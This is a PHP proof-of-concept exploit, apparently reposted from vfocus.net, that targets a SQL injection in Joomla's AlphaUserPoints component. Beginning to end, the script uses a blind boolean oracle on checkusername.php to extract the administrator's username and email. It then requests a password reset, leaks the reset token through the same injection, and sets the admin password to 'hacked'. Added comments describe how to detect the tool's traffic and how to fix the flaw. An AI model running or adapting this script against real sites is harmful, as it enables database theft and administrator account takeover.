Joomla Component AlphaUserPoints SQL Injection Exploit
来源:vfocus.net 作者:jdc 发布时间:2009-09-15  

<?php
 // Proof-of-concept (jdc, 2009) for a SQL injection in the Joomla AlphaUserPoints component.
 // What the code below visibly does: it uses the `username2points` POST parameter of
 // /components/com_alphauserpoints/assets/ajax/checkusername.php as a boolean oracle
 // (see testData(): the response either contains "OK" or it does not), leaks the first
 // gid=25 row of #__users one character at a time, and then walks the core com_user
 // password-reset flow with the leaked e-mail and the leaked `activation` column so that
 // it can set a password of its own choosing. It is kept here to study the attack pattern;
 // the notes that follow are written for the defender.
 //
 // Detection: one client issuing long bursts of POSTs to checkusername.php whose
 // username2points value carries "UNION SELECT" and "ASCII(SUBSTRING(", followed by a
 // com_user requestreset for an administrator e-mail and a view=reset&layout=complete
 // POST, is this tool's traffic shape. The User-Agent string and the cookie-jar file name
 // are fixed in getData() below.
 //
 // Mitigation: the root cause is SQL built from an unescaped request parameter; the fix is
 // a properly quoted/parameterised query in the component (or an updated component release,
 // if one exists). The script bails out when it suspects magic quotes, but magic quotes is
 // not a substitute for query parameterisation. The second half of the chain depends on the
 // reset token being readable in plaintext from #__users; storing only a hash of the token
 // would break that half.
 echo '<h2>Joomla Component AlphaUserPoints SQL Injection Exploit</h2>';
 echo '<h4>jdc 2009</h4>';
 echo '<fieldset><legend>Buffer</legend><div id="update" style="padding:8px;"></div></fieldset>';
 // Progress area: every recovered character is appended here through inline <script> tags.
 echo '<script type="text/javascript">var update = document.getElementById("update");</script>';
   // Lift PHP's limits: the blind-extraction loops make up to 94 requests per recovered
   // character, so the default max_execution_time would cut the run short.
   ini_set( "memory_limit", "128M" );
   ini_set( "max_execution_time", 0 );
   set_time_limit( 0 );
   // The target host comes from ?url=; "http://" is always prepended, no scheme handling.
   if( !isset( $_GET['url'] ) ) die( 'Usage: '.$_SERVER['SCRIPT_NAME'].'?url=www.victim.com' );
   $vulnerableFile = "http://".$_GET['url']."/components/com_alphauserpoints/assets/ajax/checkusername.php";
   $url = $vulnerableFile;
 $data = array();
 $admin = '';
 // Oracle probe: a payload that is true whenever at least one gid=25 user exists.
 // A response without "OK" stops the script (it attributes that case to magic quotes).
 $data['username2points'] = "1' AND 1=2 UNION SELECT id FROM #__users WHERE gid=25 ORDER BY id ASC LIMIT 1 -- '";
 $output = getData();
 echo 'Cheching for exploit...';
 if( !testData( $output ) ) die( 'Failed. Target may have magic quotes on.' );
 echo 'done!<br />';
 // ?check dumps the raw probe response for inspection and stops.
 if( isset( $_GET['check'] ) ) die( $output );
 echo 'Getting admin username & email (this may take some time)...';
 // Blind extraction of CONCAT(username,':',email) for the first gid=25 user: position $i
 // (up to 249) is tested against every ASCII code 32..125; the first code for which the
 // oracle answers true is taken, and the outer loop stops at the first position with no hit.
 for( $i=1;$i<250;$i++ )
 {
     $len = strlen( $admin );
     $continue = FALSE;
   for( $j=32; $j<126; $j++ )
   {
       // Once a character is found, the remaining codes are skipped without a request.
       if( $continue ) continue;
       $data = array( 'username2points' => "1' AND 1=2 UNION SELECT id FROM #__users WHERE gid=25 AND ASCII(SUBSTRING(CONCAT(username,0x3a,email),$i,1)) = $j ORDER BY id ASC LIMIT 1 -- '" );
           $output = getData();
           if( testData( $output ) )
           {
             $admin .= chr( $j );
             echo '<script type="text/javascript">update.innerHTML += "'.chr( $j ).'";</script>';
             $continue = TRUE;
           }
           // Push progress to the browser immediately instead of at script end.
           ob_end_flush();
           ob_flush();
           flush();
   }
   // No character matched at this position: treat it as the end of the string.
   if( $len == strlen( $admin ) ) break;
 }
 if( strlen( $admin ) == 0 ) die( 'failed!' );
 echo '<script type="text/javascript">update.innerHTML = "";</script>';
 echo "done!<br />";
 echo "<h4>$admin</h4>";
 // $admin[0] = username, $admin[1] = e-mail (split on the 0x3a separator injected above).
 $admin = explode( ':', $admin );
 echo "<br />Generating token...";
 // Fetch the reset form and pull out a 32-hex-character hidden field name — presumably
 // Joomla's form (CSRF) token, since it is sent as a field in every POST that follows.
 $url = "http://".$_GET['url']."/index.php?option=com_user&view=reset&tmpl=component";
 $data = array();
 $token = preg_replace( array( '/\n/', '/(?:.*)name="([a-f0-9]{32})"(?:.*)/m' ), array( '', '$1' ), getData() );
 if( strlen( $token ) != 32 ) die( 'failed!' );
 echo 'done!<br />';
 echo 'Resetting password...';
 // Request a password reset for the leaked e-mail. The script assumes the target then stores
 // the reset token in that user's `activation` column, which the next loop reads back.
 $url = "http://".$_GET['url']."/index.php?option=com_user&amp;task=requestreset";
 $data = array( 'email' => $admin[1], $token => 1 );
 getData();
 echo 'done!<br />';
 echo 'Getting Reset Token...';
 // Same blind-extraction loop as above, now against the `activation` column
 // (codes 48..125, up to 99 positions).
 $url = $vulnerableFile;
 $data = array();
 $activation = '';
 for( $i=1;$i<100;$i++ )
 {
     $len = strlen( $activation );
     $continue = FALSE;
   for( $j=48; $j<126; $j++ )
   {
       if( $continue ) continue;
       $data = array( 'username2points' => "1' AND 1=2 UNION SELECT id FROM #__users WHERE gid=25 AND ASCII(SUBSTRING(CONCAT(activation),$i,1)) = $j ORDER BY id ASC LIMIT 1 -- '" );
           $output = getData();
           if( testData( $output ) )
           {
             $activation .= chr( $j );
             echo '<script type="text/javascript">update.innerHTML += "'.chr( $j ).'";</script>';
             $continue = TRUE;
           }
           ob_end_flush();
           ob_flush();
           flush();
   }
   if( $len == strlen( $activation ) ) break;
 }
 if( strlen( $activation ) == 0 ) die( 'failed!' );
 echo 'done!<br />';
 echo 'Sending Reset Token...';
 // Complete the reset flow with the leaked token (one POST), then set the new password
 // (a second POST to the same URL) — both carry the form token extracted earlier.
 $url = "http://".$_GET['url']."/index.php?option=com_user&view=reset&layout=complete";
 $data = array( 'token' => $activation, $token => 1 );
 getData();
 echo 'done!<br />';
 echo 'Resetting Password to "hacked"...';
 $url = "http://".$_GET['url']."/index.php?option=com_user&view=reset&layout=complete";
 $data = array( 'password1' => 'hacked', 'password2' => 'hacked', $token => 1 );
 getData();
 echo 'done!<br />';
 echo '<hr />';
 echo 'You may now log in as admin using the following credentials:<br />';
 echo '<strong>'.$admin[0].'</strong> / <strong>hacked</strong><br />';
 echo '<a href="http://'.$_GET['url'].'/administrator/">Start hacking!</a>';


 function shutUp( $buffer ) { return false; }
 function testData( $output ) { return preg_match( '/OK/', $output ); }
 function getData()
 {
   // Issues one HTTP request to the global $url and returns the response body as text.
   // $data (also global) is sent as a URL-encoded POST body (http_build_query) when it is
   // non-empty; otherwise the request is a plain GET. The body is captured through output
   // buffering (ob_start/ob_get_contents) rather than as curl_exec()'s return value, and
   // ob_end_clean() drops the buffer so nothing leaks into the page this script renders.
   // Defender notes: every request from this tool carries the fixed User-Agent below,
   // follows redirects, and persists cookies in aup.cookie.txt in the working directory.
   global $data, $url;
   ob_start( "shutUp" );
   $ch = curl_init();
   curl_setopt( $ch, CURL_TIMEOUT, 120 );
   curl_setopt( $ch, CURL_RETURNTRANSFER, 0 );
   curl_setopt( $ch, CURLOPT_URL, $url );
   // Cookie jar shared across calls, presumably so the com_user reset steps share one session.
   curl_setopt( $ch, CURLOPT_COOKIEFILE, 'aup.cookie.txt' );
   curl_setopt( $ch, CURLOPT_COOKIEJAR, 'aup.cookie.txt' );
   if( count( $data ) > 0 )
   {
            curl_setopt( $ch, CURLOPT_POST, count( $data ) );
            curl_setopt( $ch, CURLOPT_POSTFIELDS, http_build_query( $data ) );
   }
   curl_setopt( $ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)" );
   curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, 1 );
   $result = curl_exec( $ch );
   curl_close( $ch );
   // $result is never read; the captured output buffer is what gets returned.
   $return = ob_get_contents();
   ob_end_clean();
   return $return;
 }

/* jdc 2009 */


 